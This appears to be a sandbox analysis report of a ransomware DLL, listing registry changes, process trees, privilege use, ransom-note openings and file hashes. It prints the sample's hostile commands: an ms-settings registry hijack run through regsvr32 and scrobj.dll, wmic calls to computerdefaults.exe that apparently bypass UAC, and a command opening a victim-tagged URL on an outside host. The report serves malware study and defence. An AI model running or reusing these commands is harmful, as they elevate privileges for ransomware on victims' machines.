Set value (data)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates\4EEF7FAF0062D34ABEE = 0300000001000000140000004eef7faf0062d34abee6137e774438ae9988739f04000000010000001000000024d7172657e6b799f66cf32ae88b5c280f0000000100000020000000547b3c62613c9c2b025d5461623ae703e9853ee45a8bf3b425bf63528e992912140000000100000014000000fe7e60dd9d8292295edf1cf80869a75b98896ed01900000001000000100000002aac2185e0e1b6503eb16a495b1815fc5c0000000100000004000000000800001800000001000000100000002d581a49c8eb5b3b3c6ef9bb65314d702000000001000000eb050000308205e7308203cfa003020102021333000001a636dabe8bbe573d9a0000000001a6300d06092a864886f70d01010b0500307e310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e312830260603550403131f4d6963726f736f667420536563757265205365727665722043412032303131301e170d3231303331313139323835325a170d3232303631313139323835325a3081a9310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e310d300b060355040b130442696e67311b301906035504031312494520496e737472756d656e746174696f6e3127302506092a864886f70d010901161862696e6769657465616d406d6963726f736f66742e636f6d30820122300d06092a864886f70d01010105000382010f003082010a0282010100d0b49f5b650f0fa690df343367a2cd62155e98e3c0fc14cb1f696618be8c327ef257f50d47bce3a4286e36edc0382e0ac81096dbce62463bb552970d01d02a7ca642d6faed9b5878c4e2e33e7c9f94ea4eb7f125662d5d2fe78138ce3e827bd98969028a908fab20632542a1ef952c10382b7efcaae1f5e7521d5fb617a93aa002b579a3203726111c73a9832712e3b5d4d140b247c91824de8123b45ea39fbcdb6e5c77d68cd3db64dd24844a1879865356f655cf1c5d94b208e244bd075a9823c87af7bcad6aab52e3444aad2947a7baad0d42c9d785964dbd8b4e09004359094d0646c3ca98e7c698b0fa7d6f1606b1459fd6df8d9aea8ae85911789bc5e10203010001a38201303082012c300e0603551d0f0101ff0404030204f030150603551d25040e300c060a2b0601040182374c0c01301d0603551d0e04160414fe7e60dd9d8292295edf1cf80869a75b98896ed0301f0603551d230418301680143656896549cb5b9b2f3cac4216504d91b933d79130530603551d1f044c304a3048a046a0448642687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b696f70732f63726c2f4d69635365635365724341323031315f323031312d31302d31382e63726c306006082b0601050507010104543052305006082b060105050730028644687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b696f70732f63657274732f4d69635365635365724341323031315f323031312d31302d31382e637274300c0603551d130101ff04023000300d06092a864886f70d01010b05000382020100c1055e1c6ece899cbff031668bd0b72ee668484f9392c48efe112ba21c521af47582849539f2fd53f7f8adecc243743211150de90b106e6bdaaedb88a8fc71aff2bd4bfeae5628507aa3b47095bf680a0a56bc6cb9c70871fa0b05857bf1762af884469264870c4139f7f9e93bbedaf73a867994c51e7c8473506f1ca68a8f9059cfa5c068be7ecade98315eebd7e71431ebe7d033b4fc8056d94ab70b03e1368082fc83a82cd632b9f3a03f9c9d51881c39b432ee9856e87835bc0481e57489da3590d20b2b9b0900704de861f994d956a2c0347178c59e5048bb9bbfbe8cef237d5860d7f407dcbce486eee7d98a90509a8f1b81445453326b139f0d2fdc68b831681fa96f2284b8153e3dbe60cb2d0ac030d0e2ecfc85c9d361c25e01cabe57cd6ebdc40708b2bd449152e90d2d45d725db856ab64d29a9fdb9fdb85f6354cbd5be240f4b71fa745db8eb32c0e4ea4747bfa5a4f9a5346e42b3379636d05e52225cea1baa7792b8f51b803658026b11fd0ab5877a99f4e74ff994c61177ea425554a7135d8b020661d2d285eb8bf1aa00d3bf78e2f5dba62cd7befdb85fffe6c1b65643f56fe36cf412f366b03bc8c78c852c1ed43a218256636d67eb8241477d3258af4f96b9698b0326d6d01826734eb18f1b393cbf85c0f9fdab4fb854536110f2f678003f80f270cbb1fbeb5ba09523f959dfeba84319577874e4dec0	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileNextUpdateDate = "359642986"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompatua\CacheP = "MicrosoftEdge_iecompatua:"
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompatua\CacheP = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatUaCache"
Key deleted	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompatua
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_ieco
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_EmieSiteList\Cach = "MicrosoftEdge\\User\\Default\\EmieSiteList"
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software	MicrosoftEdge.exe

Opens file in notepad (likely ransom note) 2 IoCs
ransomware

Processes:

notepad.exeNOTEPAD.EXE

pid process

2464 notepad.exe
3012 NOTEPAD.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

rundll32.exe

pid process

3200 rundll32.exe
3200 rundll32.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3180

pid	process
2464	notepad.exe
3012	NOTEPAD.EXE

pid	process
3180

Suspicious behavior: MapViewOfSection 10 IoCs

Processes:

rundll32.exeMicrosoftEdgeCP.exe

pid	process
3200	rundll32.exe
3200	rundll32.exe
3200	rundll32.exe
3200	rundll32.exe
3200	rundll32.exe
3200	rundll32.exe
3200	rundll32.exe
3200	rundll32.exe
4868	MicrosoftEdgeCP.exe
4868	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exeWMIC.exe

description	pid	process
Token: SeShutdownPrivilege	3180
Token: SeCreatePagefilePrivilege	3180
Token: SeShutdownPrivilege	3180
Token: SeCreatePagefilePrivilege	3180
Token: SeShutdownPrivilege	3180
Token: SeCreatePagefilePrivilege	3180
Token: SeShutdownPrivilege	3180
Token: SeCreatePagefilePrivilege	3180
Token: SeShutdownPrivilege	3180
Token: SeCreatePagefilePrivilege	3180
Token: SeShutdownPrivilege	3180
Token: SeCreatePagefilePrivilege	3180
Token: SeShutdownPrivilege	3180
Token: SeCreatePagefilePrivilege	3180
Token: SeShutdownPrivilege	3180
Token: SeCreatePagefilePrivilege	3180
Token: SeShutdownPrivilege	3180
Token: SeCreatePagefilePrivilege	3180
Token: SeIncreaseQuotaPrivilege	4764	WMIC.exe
Token: SeSecurityPrivilege	4764	WMIC.exe
Token: SeTakeOwnershipPrivilege	4764	WMIC.exe
Token: SeLoadDriverPrivilege	4764	WMIC.exe
Token: SeSystemProfilePrivilege	4764	WMIC.exe
Token: SeSystemtimePrivilege	4764	WMIC.exe
Token: SeProfSingleProcessPrivilege	4764	WMIC.exe
Token: SeIncBasePriorityPrivilege	4764	WMIC.exe
Token: SeCreatePagefilePrivilege	4764	WMIC.exe
Token: SeBackupPrivilege	4764	WMIC.exe
Token: SeRestorePrivilege	4764	WMIC.exe
Token: SeShutdownPrivilege	4764	WMIC.exe
Token: SeDebugPrivilege	4764	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4764	WMIC.exe
Token: SeRemoteShutdownPrivilege	4764	WMIC.exe
Token: SeUndockPrivilege	4764	WMIC.exe
Token: SeManageVolumePrivilege	4764	WMIC.exe
Token: 33	4764	WMIC.exe
Token: 34	4764	WMIC.exe
Token: 35	4764	WMIC.exe
Token: 36	4764	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4772	WMIC.exe
Token: SeSecurityPrivilege	4772	WMIC.exe
Token: SeTakeOwnershipPrivilege	4772	WMIC.exe
Token: SeLoadDriverPrivilege	4772	WMIC.exe
Token: SeSystemProfilePrivilege	4772	WMIC.exe
Token: SeSystemtimePrivilege	4772	WMIC.exe
Token: SeProfSingleProcessPrivilege	4772	WMIC.exe
Token: SeIncBasePriorityPrivilege	4772	WMIC.exe
Token: SeCreatePagefilePrivilege	4772	WMIC.exe
Token: SeBackupPrivilege	4772	WMIC.exe
Token: SeRestorePrivilege	4772	WMIC.exe
Token: SeShutdownPrivilege	4772	WMIC.exe
Token: SeDebugPrivilege	4772	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4772	WMIC.exe
Token: SeRemoteShutdownPrivilege	4772	WMIC.exe
Token: SeUndockPrivilege	4772	WMIC.exe
Token: SeManageVolumePrivilege	4772	WMIC.exe
Token: 33	4772	WMIC.exe
Token: 34	4772	WMIC.exe
Token: 35	4772	WMIC.exe
Token: 36	4772	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4764	WMIC.exe
Token: SeSecurityPrivilege	4764	WMIC.exe
Token: SeTakeOwnershipPrivilege	4764	WMIC.exe
Token: SeLoadDriverPrivilege	4764	WMIC.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

ComputerDefaults.exenotepad.exe

pid process

2132 ComputerDefaults.exe
2464 notepad.exe
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeOpenWith.exe

pid process

3180
2060 MicrosoftEdge.exe
4868 MicrosoftEdgeCP.exe
4868 MicrosoftEdgeCP.exe
4636 OpenWith.exe

pid	process
2132	ComputerDefaults.exe
2464	notepad.exe

pid	process
3180
2060	MicrosoftEdge.exe
4868	MicrosoftEdgeCP.exe
4868	MicrosoftEdgeCP.exe
4636	OpenWith.exe

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

rundll32.execmd.execmd.execmd.execmd.exeMicrosoftEdgeCP.exe

description	pid	process	target process
PID 3200 wrote to memory of 2464	3200	rundll32.exe	notepad.exe
PID 3200 wrote to memory of 2464	3200	rundll32.exe	notepad.exe
PID 3200 wrote to memory of 4416	3200	rundll32.exe	cmd.exe
PID 3200 wrote to memory of 4416	3200	rundll32.exe	cmd.exe
PID 3200 wrote to memory of 4436	3200	rundll32.exe	cmd.exe
PID 3200 wrote to memory of 4436	3200	rundll32.exe	cmd.exe
PID 3200 wrote to memory of 2412	3200	rundll32.exe	cmd.exe
PID 3200 wrote to memory of 2412	3200	rundll32.exe	cmd.exe
PID 2412 wrote to memory of 4764	2412	cmd.exe	WMIC.exe
PID 2412 wrote to memory of 4764	2412	cmd.exe	WMIC.exe
PID 4436 wrote to memory of 4772	4436	cmd.exe	WMIC.exe
PID 4436 wrote to memory of 4772	4436	cmd.exe	WMIC.exe
PID 2104 wrote to memory of 2500	2104	cmd.exe	ComputerDefaults.exe
PID 2104 wrote to memory of 2500	2104	cmd.exe	ComputerDefaults.exe
PID 2536 wrote to memory of 2132	2536	cmd.exe	ComputerDefaults.exe
PID 2536 wrote to memory of 2132	2536	cmd.exe	ComputerDefaults.exe
PID 4868 wrote to memory of 2544	4868	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4868 wrote to memory of 2544	4868	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4868 wrote to memory of 2544	4868	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3180 wrote to memory of 3012	3180		NOTEPAD.EXE
PID 3180 wrote to memory of 3012	3180		NOTEPAD.EXE

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e.dll,#1
1⤵
- Modifies extensions of user files
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3200
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  - Suspicious use of FindShellTrayWindow
  PID:2464
- C:\Windows\system32\cmd.exe
  cmd /c "start http://f87440d80eb8cc009dihlxbl.uponmix.xyz/dihlxbl^&1^&28203620^&69^&307^&2215063"
  2⤵
  - Checks computer location settings
  PID:4416
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2412
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4764
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4436
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4772

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2104
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2500

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2536
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:2132

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2060

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:1788

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4868

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:4360

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:588

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2544

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4636

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\readme.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:3012

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\Windows\3720402701\2219095117.pri

Filesize
207KB

MD5
e2b88765ee31470114e866d939a8f2c6

SHA1
e0a53b8511186ff308a0507b6304fb16cabd4e1f

SHA256
523e419d2fa2e780239812d36caa37e92f8c3e6a5cd9f18f0d807c593effa45e

SHA512
462e8e6b4e63fc6781b6a9935b332a1dc77bfb88e1de49134f86fd46bd1598d2e842902dd9415a328e325bd7cdee766bd9473f2695acdfa769ffe7ba9ae1953d

Download Submit
C:\Users\Admin\Desktop\readme.txt

Filesize
1KB

MD5
644f630d614ed392b17158815049772b

SHA1
450acce5c18ac9770bdddf05dc4e65cfbe6e3c96

SHA256
ca7f6747b698ceb5282c4902c8d13ecbf7380438d35403134d8610fd1fc1a277

SHA512
fa28af5eec4da3927c4a4b7a81f0a2e746b1edbe851342f6ba6be926ba1303c8bad75a2f4d8f50a82cb5514469fe174a01f25adae77d27e01d504065fef46ed8

Download Submit
C:\Users\Public\readme.txt

Filesize
1KB

MD5
644f630d614ed392b17158815049772b

SHA1
450acce5c18ac9770bdddf05dc4e65cfbe6e3c96

SHA256
ca7f6747b698ceb5282c4902c8d13ecbf7380438d35403134d8610fd1fc1a277

SHA512
fa28af5eec4da3927c4a4b7a81f0a2e746b1edbe851342f6ba6be926ba1303c8bad75a2f4d8f50a82cb5514469fe174a01f25adae77d27e01d504065fef46ed8

Download Submit
memory/2060-129-0x0000028979F20000-0x0000028979F30000-memory.dmp

Filesize
64KB

Download
memory/2060-128-0x0000028979E20000-0x0000028979E30000-memory.dmp

Filesize
64KB

Download
memory/2132-127-0x0000000000000000-mapping.dmp

Download
memory/2412-122-0x0000000000000000-mapping.dmp

Download
memory/2464-118-0x0000000000000000-mapping.dmp

Download
memory/2500-125-0x0000000000000000-mapping.dmp

Download
memory/2544-137-0x000001E9B33D0000-0x000001E9B33D2000-memory.dmp

Filesize
8KB

Download
memory/2544-139-0x000001E9B33F0000-0x000001E9B33F2000-memory.dmp

Filesize
8KB

Download
memory/2544-134-0x000001E9B33A0000-0x000001E9B33A2000-memory.dmp

Filesize
8KB

Download
memory/3012-149-0x0000000000000000-mapping.dmp

Download
memory/3200-117-0x000001A4628F0000-0x000001A4628F4000-memory.dmp

Filesize
16KB

Download
memory/3972-151-0x000001FF873E0000-0x000001FF873E8000-memory.dmp

Filesize
32KB

Download
memory/3972-157-0x000001FF87380000-0x000001FF87388000-memory.dmp

Filesize
32KB

Download
memory/3972-126-0x000001FF87640000-0x000001FF87648000-memory.dmp

Filesize
32KB

Download
memory/3972-160-0x000001FF87BF0000-0x000001FF87BF8000-memory.dmp

Filesize
32KB

Download
memory/3972-159-0x000001FF87C20000-0x000001FF87C28000-memory.dmp

Filesize
32KB

Download
memory/3972-158-0x000001FF87940000-0x000001FF87948000-memory.dmp

Filesize
32KB

Download
memory/3972-150-0x000001FF873E0000-0x000001FF873E8000-memory.dmp

Filesize
32KB

Download
memory/3972-131-0x000001FF876E0000-0x000001FF876E8000-memory.dmp

Filesize
32KB

Download
memory/3972-152-0x000001FF874C0000-0x000001FF874C8000-memory.dmp

Filesize
32KB

Download
memory/3972-153-0x000001FF877E0000-0x000001FF877E8000-memory.dmp

Filesize
32KB

Download
memory/3972-154-0x000001FF875D0000-0x000001FF875D8000-memory.dmp

Filesize
32KB

Download
memory/3972-155-0x000001FF87930000-0x000001FF87938000-memory.dmp

Filesize
32KB

Download
memory/3972-156-0x000001FF872C0000-0x000001FF872C8000-memory.dmp

Filesize
32KB

Download
memory/4416-120-0x0000000000000000-mapping.dmp

Download
memory/4436-121-0x0000000000000000-mapping.dmp

Download
memory/4764-123-0x0000000000000000-mapping.dmp

Download
memory/4772-124-0x0000000000000000-mapping.dmp

Download